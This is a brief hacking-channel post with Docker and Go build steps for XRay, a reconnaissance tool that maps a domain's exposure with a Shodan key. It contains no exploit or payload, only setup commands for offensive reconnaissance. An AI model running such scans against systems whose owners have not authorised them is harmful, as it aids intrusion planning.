๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

Building a Docker image
To build a Docker image with the latest version of XRay:

1) git clone https://github.com/evilsocket/xray.git

2) cd xray

3) docker build -t xraydocker .

4) Once built, XRay can be started within a Docker container using the following:

>docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com

>Manual Compilation
Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

5) Then:
> go get github.com/evilsocket/xray

> cd $GOPATH/src/github.com/evilsocket/xray/

> make
You'll find the executable in the build folder.

๐Ÿฆ‘Tested by UndercOde on:

> debian

E N J O Y
@UndercodeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚